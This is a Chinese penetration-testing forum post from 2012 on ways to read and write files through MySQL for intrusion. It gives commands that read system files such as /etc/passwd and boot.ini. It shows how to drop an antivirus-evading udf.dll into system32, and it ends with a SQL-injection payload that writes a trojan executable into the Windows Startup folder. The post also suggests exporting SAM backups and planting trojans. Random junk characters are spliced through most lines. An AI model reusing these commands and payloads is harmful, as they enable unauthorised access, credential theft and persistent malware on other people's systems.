找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 mysql下读取文件的几种方式
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2018|回复: 0
打印 上一主题 下一主题

mysql下读取文件的几种方式

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。 ( ^. j' M& j/ U& M% R; Z* C/ B
思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同
# t  E6 p# S* j
5 b% O% f5 i6 I2 s3 W! D/ rmysql3.x下
' d/ k' e1 s) n$ h. R( y+ q% v  {3 `! ?$ i) A
不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下
$ y1 h; C  q" [/ y  C8 \, H, v, k$ H0 d4 p9 X9 j' p
mysql>create table a (cmd text);
; B% I/ A* R! K5 s& M& f7 bmysql>load data infile 'c:\\boot.ini' into table a;
! L+ U' B! g' y7 a2 imysql>select * from a;
; U: i; g$ {/ y2 y6 l: U  h% R0 l7 A) P! ?. v5 q9 t# V
mysql4.x下 9 Q9 H2 D% y* A$ i5 R

* X4 C3 o  V( `0 S. Mmysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下 & O3 ?5 q# h) R

! [/ E0 L# F: Vmysql>create table a (cmd text); ) v+ J; Q8 o0 l* u# B  `) k- x7 u8 ]
mysql>insert into a (cmd) values (load_file('c:\\boot.ini')); % e2 C8 Y' B; C( x/ i: U5 T) ^
mysql>select * from a; & k+ u  i5 M) e% \
9 M# B! U) }% [$ U9 q( p; H
mysql5.x下 " c: m! E; R' E0 n( C

% X$ I+ E+ Q2 S5 L4 Q; \在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下
+ g4 _. F8 d; A' A7 ^% d0 B+ @
2 V/ P/ ^; [: W: k' n& C# Cmysql>system cat /etc/passwd
' R6 z3 z- @: P, h' F
: d. \! ?' O) s& _! E& w. Y
1 V* w0 A  M: M, }9 @- C& B, Umysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。 % R! p+ u; T3 z4 U! h  P# V! f

2 q& p* S; S: ^6 F5 U, H  k5 {0 {* C5 A9 C
例:把免杀过的udf.dll文件插入系统目录
6 L+ S* L3 m# ?) s
* m/ L; c( a, [' ~% c8 Z/ Xcreate table a (cmd LONGBLOB);   q4 }1 L/ a% u& M
insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll')));
+ K' T$ i4 K* K4 }& J# E( S* I* `SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';
6 N% D% X* ]" V$ X+ L7 n) @) b3 D9 j% F% B3 `4 Y
其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。
# w* n- S8 W. n+ a4 ]; E8 u7 H* S2 r; V

: ~) O1 _% ~- _8 N. {! \  X注入中的语法(未测试) " K4 j$ M% f* o1 k# |

* W3 C6 [, @* r5 f/ |) r4 S
3 X8 B8 Y& t+ zid=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\「开始」菜单\程序\启动\\mm.exe'/*
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表